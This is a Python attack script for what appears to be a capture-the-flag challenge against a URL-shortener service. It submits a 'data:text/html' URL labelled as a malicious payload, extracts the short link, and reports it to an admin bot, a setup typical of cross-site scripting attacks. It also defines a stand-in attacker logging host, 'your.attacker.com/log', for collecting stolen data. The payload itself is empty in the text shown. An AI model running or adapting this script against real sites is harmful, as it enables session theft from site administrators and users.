import requests ATTACKER_HOST = "http://your.attacker.com/log" TARGET = "http://target-ctf.com" # Step 1: Create a shortened URL with a malicious payload payload_url = f"data:text/html," res = requests.post(f"{TARGET}/", data={"original_url": payload_url}) assert res.ok print("[+] Shortened URL submitted") # Step 2: Extract short code from the response from bs4 import BeautifulSoup soup = BeautifulSoup(res.text, "html.parser") short_link = soup.find("input", {"id": "shortened"})["value"] short_code = short_link.split("/")[-1] # Step 3: Submit to /report endpoint report_res = requests.post(f"{TARGET}/report", data={"submit_id": short_link}) if report_res.ok: print(f"[+] Reported to bot: {short_link}") else: print("[-] Report failed")